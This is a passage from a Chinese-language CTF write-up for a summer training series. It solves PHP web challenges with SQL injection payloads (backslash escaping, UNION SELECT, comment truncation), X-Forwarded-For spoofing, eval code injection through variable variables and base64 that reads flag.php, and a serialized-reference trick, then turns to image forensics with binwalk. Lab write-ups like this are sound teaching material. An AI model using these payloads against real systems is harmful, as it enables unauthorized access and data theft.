<p>可以看到两个参数 <code>username</code> 和 <code>password</code> 都做了过滤。翻一下 PHP 文档，发现 <code>get_magic_quotes_gpc()</code> 永远返回 false，所以这个 <code>if</code> 就不用管了，只需要看 <code>htmlentities</code> 就可以了。</p>
<p><code>htmlentities</code> 在第二个参数传入 <code>ENT_QUOTES</code> 的时候，会对 <code>$str</code> 的单、双引号进行转义，具体为 <code>"</code> 转成 <code>&amp;quot;</code>，<code>'</code> 转成 <code>&amp;#039;</code>。思索一下，感觉绕过 <code>htmlentities</code> 来传入引号有点困难，看看有没有别的路可以走。</p>
<p><del>不难发现</del>，<code>htmlentities</code> 没有处理 <code>\</code> 反斜杠，如果在 <code>username</code> 里面传入 <code>\</code> 的话，SQL 就会变成</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> name<span class="operator">=</span><span class="string">'\'</span> <span class="keyword">AND</span> pass<span class="operator">=</span><span class="string">'&lt;password&gt;'</span>;</span><br></pre></td></tr></tbody></table></figure>
<p><del>这个高亮好像有点问题，它没有处理 <code>\</code></del>。然后就发现，它变成了 <code>name</code> 跟 <code>' AND pass=</code> 做比较，然后后面 <code>&lt;password&gt;</code> 的地方就可以随便注了。后面多余的那个单引号用注释干掉就可以了</p>
<p>比如我们可以来一个 <code>password</code> 为 <code>or 1=1; -- a</code>，就可以构造这么一个 SQL：</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> name<span class="operator">=</span><span class="string">'\" AND pass='</span> <span class="keyword">or</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span>; <span class="comment">-- a';</span></span><br></pre></td></tr></tbody></table></figure>
<blockquote>
<p>因为这个高亮确实不太行，所以这里我把 <code>\'</code> 换成 <code>\"</code> 来让它正确高亮了，实际上还是单引号的。</p>
</blockquote>
<p>然后把这个请求扔上去，就发现它确实绕过去了：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Why_sqli_1.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Why_sqli_1.png" loading="lazy"></a></p>
<p>不过……这个好像不是 flag？</p>
<p>唔……那就查查另外几行吧。（如果还是不行的话，后面还可以用 <code>UNION SELECT</code> 对数据库进行全面的扒取。）</p>
<p>用 <code>LIMIT 1 OFFSET x</code> 查查另外几行，然后在试到第三行的时候（即 <code>LIMIT 1 OFFSET 2</code>），发现 flag：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Why_sqli_2.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Why_sqli_2.png" loading="lazy"></a></p>
<h1 id="week-3">Week 3</h1>
<h2 id="whats-my-ip-address">What's my IP address?</h2>
<p>直接访问，然后获得 PHP 源代码（下面的代码是稍微格式化过的）。</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">"flag.php"</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetIP</span>(<span class="params"></span>)</span>{</span><br><span class="line">  <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">"HTTP_CLIENT_IP"</span>]))</span><br><span class="line">    <span class="variable">$cip</span> = <span class="variable">$_SERVER</span>[<span class="string">"HTTP_CLIENT_IP"</span>];</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">"HTTP_X_FORWARDED_FOR"</span>]))</span><br><span class="line">    <span class="variable">$cip</span> = <span class="variable">$_SERVER</span>[<span class="string">"HTTP_X_FORWARDED_FOR"</span>];</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">"REMOTE_ADDR"</span>]))</span><br><span class="line">    <span class="variable">$cip</span> = <span class="variable">$_SERVER</span>[<span class="string">"REMOTE_ADDR"</span>];</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    <span class="variable">$cip</span> = <span class="string">"0.0.0.0"</span>;</span><br><span class="line">  <span class="keyword">return</span> <span class="variable">$cip</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$GetIPs</span> = <span class="title function_ invoke__">GetIP</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$GetIPs</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$GetIPs</span> == <span class="string">"1.1.1.1"</span>){</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">"Great! Key is <span class="subst">$flag</span>"</span>;</span><br><span class="line">} <span class="keyword">else</span>{</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">"Error! Your IP address isn't in the legal range!"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>具体逻辑就是先后尝试从 <code>_SERVER</code> 的 <code>HTTP_CLIENT_IP</code>, <code>HTTP_X_FORWARDED_FOR</code>, <code>REMOTE_ADDR</code> 取 IP 地址，然后再跟 <code>1.1.1.1</code> 比较，相等则给出 flag。</p>
<p>想要真实地从 <code>1.1.1.1</code> 发送请求，有亿点困难（<del>可能可以 py Cloudflare？</del>）。不过好消息是，<code>HTTP_CLIENT_IP</code> 和 <code>HTTP_X_FORWARDED_FOR</code> 都是可以伪造的（<code>REMOTE_ADDR</code> 不能伪造）。<code>HTTP_CLIENT_IP</code> 是从 HTTP headers 的 <code>Client-IP</code> 取值，<code>HTTP_X_FORWARDED_FOR</code> 从 <code>X-Forwarded-For</code> 取值。</p>
<p>然后手动设置这两个的其中一个，再请求一下，就可以了。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Whats_my_IP_address.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Whats_my_IP_address.png" loading="lazy"></a></p>
<h2 id="flag-助力大红包">FLAG 助力大红包</h2>
<p>跟上一题差不多，不过要用 <code>X-Forwarded-For</code>。（<code>Client-IP</code> 没试过，不知道行不行。）</p>
<p>详情见 Hackergame 2021 题解的 <a href="/2021/10/31/Hackergame-2021/#flag-助力大红包">FLAG 助力大红包</a>。</p>
<h2 id="sqli">SQLI</h2>
<p>首先先直接访问，发现页面上有一句 "source file in web9.php.bak"。访问这个页面，获得 PHP 源代码（下面的代码也是稍微格式化过的）。</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$user</span> = <span class="variable">$_POST</span>[<span class="string">"user"</span>];</span><br><span class="line"><span class="variable">$pass</span> = <span class="title function_ invoke__">md5</span>(<span class="variable">$_POST</span>[<span class="string">"pass"</span>]);</span><br><span class="line"></span><br><span class="line"><span class="variable">$sql</span> = <span class="string">"select pw from php where user='<span class="subst">$user</span>'"</span>;</span><br><span class="line"><span class="variable">$query</span> = <span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="keyword">if</span> (!<span class="variable">$query</span>) {</span><br><span class="line">  <span class="title function_ invoke__">printf</span>(<span class="string">"Error: %s\n"</span>, <span class="title function_ invoke__">mysql_error</span>(<span class="variable">$conn</span>));</span><br><span class="line">  <span class="keyword">exit</span>();</span><br><span class="line">}</span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_array</span>(<span class="variable">$query</span>, MYSQL_ASSOC);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ((<span class="variable">$row</span>[<span class="string">"pw"</span>]) &amp;&amp; (!<span class="title function_ invoke__">strcasecmp</span>(<span class="variable">$pass</span>, <span class="variable">$row</span>[<span class="string">"pw"</span>]))) {</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Logged in! Key:************** &lt;/p&gt;"</span>;</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Log in failure!&lt;/p&gt;"</span>;</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<blockquote>
<p>大概需要提前说明的一点是，这道题的 flag 不在数据库里面，如果直接硬注数据库的话，也能拿到 flag，但不是这道题的 flag。</p>
<p>实际上，flag 在 <code>Key: **************</code> 这个地方，虽然“备份文件”把它模糊掉了，实际上运行的代码是有的。</p>
</blockquote>
<p>这里的话，如果要让他成功输出 <code>Key</code>，那就需要让那条 <code>if</code> 判断为 <code>true</code>，即需要让 <code>$pass</code> 和 <code>$row["pw"]</code> 相等。其中 <code>$pass</code> 是可控的，比如说我们传入 <code>pass=a</code>，那么 <code>$pass</code> 就是 <code>0cc175b9c0f1b6a831c399e269772661</code>（<code>a</code> 的 MD5）。如果我们能让从数据库查出来的 <code>$row["pw"]</code> 跟 <code>0cc175b9c0f1b6a831c399e269772661</code> 相等，就可以了。</p>
<p>然后 <code>$user</code> 没有任何过滤，直接用 <code>UNION SELECT</code> 注入就可以了。令 <code>user</code> 为 <code>' UNION SELECT '0cc175b9c0f1b6a831c399e269772661'; -- a</code>，执行的 SQL 就是：</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> pw <span class="keyword">from</span> php <span class="keyword">where</span> <span class="keyword">user</span><span class="operator">=</span><span class="string">''</span> <span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="string">'0cc175b9c0f1b6a831c399e269772661'</span>; <span class="comment">-- a'</span></span><br></pre></td></tr></tbody></table></figure>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/SQLI.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/SQLI.png" loading="lazy"></a></p>
<p>然后就拿到了 flag。</p>
<h2 id="simple-sqli">Simple SQLI</h2>
<p>首先先直接访问，感觉 UI 好像跟上一题差不多，并且 F12 发现注释里有一句 "web11.php.bak"。访问这个页面，获得 PHP 源代码（下面的代码也是稍微格式化过的，并且删掉了一些无关紧要的部分）。</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">"../web9/db.php"</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$user</span> = <span class="variable">$_POST</span>[<span class="string">"user"</span>];</span><br><span class="line"><span class="variable">$pass</span> = <span class="title function_ invoke__">md5</span>(<span class="variable">$_POST</span>[<span class="string">"pass"</span>]);</span><br><span class="line"></span><br><span class="line"><span class="variable">$sql</span> = <span class="string">"select user from php where (user='<span class="subst">$user</span>') and (pw='<span class="subst">$pass</span>')"</span>;</span><br><span class="line"><span class="variable">$query</span> = <span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_array</span>(<span class="variable">$query</span>, MYSQL_ASSOC);</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$row</span>[<span class="string">"user"</span>] == <span class="string">"admin"</span>) {</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Logged in! Key: *********** &lt;/p&gt;"</span>;</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">  <span class="keyword">echo</span>(<span class="string">"&lt;p&gt;You are not admin!&lt;/p&gt;"</span>);</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>这道题注起来似乎比上一题还简单，因为 <code>$user</code> 就是一个十分可控的注入点。直接令 <code>user</code> 为 <code>admin'); -- a</code>，就能拼出这么个查询 SQL：</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> php <span class="keyword">where</span> (<span class="keyword">user</span><span class="operator">=</span><span class="string">'admin'</span>); <span class="comment">-- a') and (pw='$pass')</span></span><br></pre></td></tr></tbody></table></figure>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Simple_SQLI.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Simple_SQLI.png" loading="lazy"></a></p>
<p>然后就能获得 flag 了。连 <code>pass</code> 都不用管。</p>
<h2 id="not-easy-sql-injection">Not easy SQL injection</h2>
<p>直接访问，然后获得 PHP 源代码（下面的代码是稍微格式化过的）。</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment"># $yourInfo=array(</span></span><br><span class="line"><span class="comment">#   'id'    =&gt; 1,</span></span><br><span class="line"><span class="comment">#   'name'  =&gt; 'admin',</span></span><br><span class="line"><span class="comment">#   'pass'  =&gt; 'xxx',</span></span><br><span class="line"><span class="comment">#   'level' =&gt; 1</span></span><br><span class="line"><span class="comment"># );</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">'db.inc.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$_CONFIG</span>[<span class="string">'extraSecure'</span>] = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span> (<span class="keyword">array</span>(<span class="string">'_GET'</span>, <span class="string">'_POST'</span>, <span class="string">'_REQUEST'</span>, <span class="string">'_COOKIE'</span>) <span class="keyword">as</span> <span class="variable">$method</span>) {</span><br><span class="line">  <span class="keyword">foreach</span> (<span class="variable">$$method</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) {</span><br><span class="line">    <span class="keyword">unset</span>(<span class="variable">$$key</span>);</span><br><span class="line">  }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$kw</span> = <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'kw'</span>]) ? <span class="title function_ invoke__">trim</span>(<span class="variable">$_GET</span>[<span class="string">'kw'</span>]) : <span class="keyword">die</span>(<span class="string">'Please enter in a search keyword.'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_CONFIG</span>[<span class="string">'extraSecure'</span>]) {</span><br><span class="line">  <span class="variable">$kw</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">'#[^a-z0-9_-]#i'</span>,<span class="string">''</span>,<span class="variable">$kw</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$query</span> = <span class="string">'SELECT * FROM messages WHERE message LIKE \'%'</span>.<span class="variable">$kw</span>.<span class="string">'%\';'</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$result</span> = <span class="title function_ invoke__">mysql_query</span>(<span class="variable">$query</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">mysql_errno</span>()) <span class="keyword">die</span>(<span class="title function_ invoke__">mysql_error</span>());</span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_assoc</span>(<span class="variable">$result</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"id: "</span>.<span class="variable">$row</span>[<span class="string">'id'</span>].<span class="string">"&lt;/br&gt;message: "</span>.<span class="variable">$row</span>[<span class="string">'message'</span>].<span class="string">"&lt;/br&gt;"</span>;</span><br></pre></td></tr></tbody></table></figure>
<p>首先就是那两个 <code>foreach</code>，由于用了一些炫酷的语法糖所以可能会比较难懂，它的意思是，对于每个出现在 <code>$_GET</code>, <code>$_POST</code> 等位置的 key-value 对，都执行一遍 <code>unset($$key)</code>。<code>unset</code> 可以抹除某个变量，比如 <code>unset("v")</code> 会把一个名为 <code>v</code> 的变量给抹除。</p>
<p>然后下面有一个如果 <code>$_CONFIG['extraSecure']</code> 为真，则对 <code>$kw</code> 做过滤。它很烦，我们不想让它过滤。可以利用上面所说的 <code>unset</code>，让它把 <code>$_CONFIG</code> unset 掉，就可以 bypass 掉这个过滤了。</p>
<p>然后随便瞎注一下，发现 flag 不在 <code>messages</code> 里。联系到注释所说的，我们大概要拿到 admin 的密码，那样的话，我们就要拿到用户表。用户表的话，先盲猜一个表名是 <code>users</code>（如果猜不中的话，可以查 <code>information_schema</code> 来获得所有的表名）。</p>
<p>然后直接用 <code>UNION SELECT</code> 嗯注（前面加一个 <code>1=0</code> 让前面查不出结果，这样的话，第一条就是从 <code>UNION SELECT</code> 右边过来的）：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Not_easy_SQL_injection.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Not_easy_SQL_injection.png" loading="lazy"></a></p>
<p>发现运气不错（这里真的是运气不错），flag 直接就出现了。</p>
<blockquote>
<p>对于更一般的题目，由于 <code>UNION SELECT</code> 要求前后两个查询的列数必须相同，所以莽 <code>SELECT *</code> 大概率是会挂的，就需要再判断一下前面有多少列。<br>
而且这里 <code>users</code> 的 <code>pass</code> 列恰好跟 <code>message</code> 的 <code>id</code> 列能对上，才可以直接通过 <code>id</code> 拿到 flag。否则就还需要枚举一下看看是哪列对应哪列。</p>
</blockquote>
<h2 id="reverse-shell-included">Reverse shell included</h2>
<p>这道题的 PHP 代码，核心的只有两行：</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$str</span>=@(<span class="keyword">string</span>)<span class="variable">$_GET</span>[<span class="string">'str'</span>]; </span><br><span class="line"><span class="keyword">eval</span>(<span class="string">'$str="'</span>.<span class="title function_ invoke__">addslashes</span>(<span class="variable">$str</span>).<span class="string">'";'</span>); </span><br></pre></td></tr></tbody></table></figure>
<!-- katex: off -->
<p>这里毕竟有 <code>addslashes</code>，这就意味着我们不能用单、双引号了。不过我们还是可以用上面提到过的 <a target="_blank" rel="noopener" href="https://www.php.net/manual/en/language.variables.variable.php">Variable variables</a>，比如说填 <code>${$str}</code> 之类的。</p>
<p>然后 <code>${ }</code> 里面还可以写函数，运行的时候就会调用函数求值。如果不确定的话，可以试试 <code>phpinfo()</code> 之类的函数确认一下：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Reverse_shell_included_1.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Reverse_shell_included_1.png" loading="lazy"></a></p>
<p>看起来确实可以。那……既然可以调用函数，那就直接上 <code>eval</code> 吧。不过这里有个问题，就是 <code>eval</code> 需要传入字符串，但是这里又不能用单、双引号，怎么办呢…</p>
<h3 id="solution-1">Solution 1</h3>
<p>PHP 的大部分版本支持 Unquoted strings，即如果你使用一个未被定义的常量（不以 <code>$</code> 开头），PHP 会把它当成字符串来用。</p>
<p>例如，如果运行 <code>var_dump(NONEXISTENT);</code>，PHP 就会输出：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Notice: Use of undefined constant NONEXISTENT - assumed 'NONEXISTENT' in %s on line %d</span><br><span class="line">string(11) "NONEXISTENT"</span><br></pre></td></tr></tbody></table></figure>
<p>Notice 那一行只是警告，不会真的输出到网页。不过从第二行的 <code>string(11) "NONEXISTENT"</code> 可以看出，PHP 确实把 <code>NONEXISTENT</code> 当成 <code>"NONEXISTENT"</code> 来用了。</p>
<blockquote>
<p>从 PHP 7.2.x 版本开始，就会报 Warning 而不是 Notice。并且从 8.x.x 开始，这个就会抛出错误（就是说不能用了）。</p>
</blockquote>
<p>不过这个有个限制，就是这个字符串只能是合法的常量名，像 <code>a=b</code> 就不行。</p>
<p>不过这个也好说，直接套一层 base64 编码。base64 编码之后的一般是合法的常量名（首字符一般是字母，后面一般都是字母和数字），如果编码出来的字符串末尾有 <code>=</code> 占位符的话，可以去掉，在这里不影响解码。</p>
<p>读取文件并输出，可以使用 <code>echo readfile("flag.php");</code>（注意末尾分号），base64 之后就是 <code>ZWNobyByZWFkZmlsZSgiZmxhZy5waHAiKTs=</code>。</p>
<p>于是我们就发送一个 <code>str</code> 是 <code>${eval(base64_decode(ZWNobyByZWFkZmlsZSgiZmxhZy5waHAiKTs))}</code> 的 payload，就行了。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Reverse_shell_included_sol_1.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Reverse_shell_included_sol_1.png" loading="lazy"></a></p>
<h3 id="solution-2">Solution 2</h3>
<p>另外一个思路就是，如果不能直接写字符串的话，我们可以引用另外的变量传给 <code>eval</code>。但是哪来的变量能用呢？</p>
<!-- katex: off -->
<p>一个很直接的想法就是用 <code>$_GET</code>，我们可以把 <code>$_GET[0]</code> 传给 <code>eval</code>，即令 <code>str</code> 为 <code>${eval($_GET[0])}</code>；然后再加一个名字是 <code>0</code> 的参数，这个参数的内容就可以随便写了，比如我们想读文件，就可以用 <code>echo readfile("flag.php");</code>。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Reverse_shell_included_sol_2.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Reverse_shell_included_sol_2.png" loading="lazy"></a></p>
<h2 id="php-pop">PHP POP</h2>
<p>按照惯例，先访问一下，然后获得 PHP 源代码（下面的代码是稍微格式化过的）（<code>get_magic_quotes_gpc</code> 因为上面已经说过的原因，就忽略了）。</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">"flag.php"</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">just4fun</span> </span>{</span><br><span class="line">  <span class="keyword">var</span> <span class="variable">$enter</span>;</span><br><span class="line">  <span class="keyword">var</span> <span class="variable">$secret</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$pass</span> = <span class="variable">$_GET</span>[<span class="string">'pass'</span>];</span><br><span class="line"><span class="variable">$o</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$pass</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$o</span>) {</span><br><span class="line">  <span class="variable">$o</span>-&gt;secret = <span class="variable">$flag</span>;</span><br><span class="line">  <span class="keyword">if</span> (<span class="variable">$o</span>-&gt;secret === <span class="variable">$o</span>-&gt;enter)</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"Congratulation! Here is my secret: "</span>.<span class="variable">$o</span>-&gt;secret;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"Oh no... You can't fool me"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">echo</span> <span class="string">"are you trolling?"</span>;</span><br></pre></td></tr></tbody></table></figure>
<p><del>说实话，这道题我做的时候是走了挺多弯路的。</del></p>
<p>首先看一下，感觉核心就是 <code>unserialize</code> 这个函数了。第一感觉就是能不能在 <code>unserialize</code> 里面执行代码，或者读取 <code>$flag</code> 这个变量来用。但是很遗憾的是，前者由于没有魔术方法，不太行；后者直接就没找到相关资料。</p>
<p>不过反过来想一想，如果可以用上面的方法，它就没有必要多此一举弄 <code>$enter</code> 和 <code>$secret</code> 了。一个可行的思路，可能是把 <code>$o-&gt;enter</code> 指向 <code>$o-&gt;secret</code>，这样的话就可以把这两个变量“绑定”在一起，也就可以绕过判断了。</p>
<p>然后翻了一下，发现好像 PHP 确实有 reference，可以用 <code>&amp;</code>，于是我们可以在本地写个脚本，让 <code>$o-&gt;enter</code> 指向 <code>$o-&gt;secret</code>，再调用 <code>serialize</code> 生成 payload。</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">just4fun</span> </span>{</span><br><span class="line">  <span class="keyword">var</span> <span class="variable">$enter</span>;</span><br><span class="line">  <span class="keyword">var</span> <span class="variable">$secret</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$o</span> = <span class="keyword">new</span> just4fun;</span><br><span class="line"><span class="variable">$o</span>-&gt;enter = &amp;<span class="variable">$o</span>-&gt;secret;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$o</span>);</span><br></pre></td></tr></tbody></table></figure>
<p>就得到 payload <code>O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}</code>。然后把这个 payload 扔上去，就能拿到 flag。</p>
<h1 id="week-4">Week 4</h1>
<h2 id="information">Information</h2>
<p>先用二进制编辑器打开图片，然后发现文件前面有一段文本，里面有一段非常“熟悉”的编码（其实就是 base64）。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Information_binary.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Information_binary.png" loading="lazy"></a></p>
<p>把它提取出来，解码一下，就拿到了 flag。</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cGljb0NURnt0aGVfbTN0YWRhdGFfMXNfbW9kaWZpZWR9</span><br><span class="line">picoCTF{the_m3tadata_1s_modified}</span><br></pre></td></tr></tbody></table></figure>
<h2 id="matryoshka-doll">Matryoshka doll</h2>
<p>题目名字 “Matryoshka doll” 指的是俄罗斯套娃，提示这张图里面很可能藏着另一张图片。</p>
<p>所以来 <code>binwalk</code> 一下，果然发现了里面藏着一个 zip 压缩包。</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ binwalk dolls.jpg</span><br><span class="line"></span><br><span class="line">DECIMAL       HEXADECIMAL     DESCRIPTION</span><br><span class="line">--------------------------------------------------------------------------------</span><br><span class="line">0             0x0             PNG image, 594 x 1104, 8-bit/color RGBA, non-interlaced</span><br><span class="line">3226          0xC9A           TIFF image data, big-endian, offset of first image directory: 8</span><br><span class="line">272492        0x4286C         Zip archive data, at least v2.0 to extract, compressed size: 378942, uncompressed size: 383937, name: base_images/2_c.jpg</span><br><span class="line">651600        0x9F150         End of Zip archive, footer length: 22</span><br></pre></td></tr></tbody></table></figure>
<p>并且这个压缩包里面还有一个文件 2_c.jpg。于是我们用 <code>binwalk dolls.jpg -e</code> 把里面藏着的东西 <strong>E</strong>xtract 出来。</p>
<p>然后发现 2_c.jpg 似乎跟原图差不多。考虑到题目的名字指俄罗斯套娃，那…肯定还要继续拆。</p>
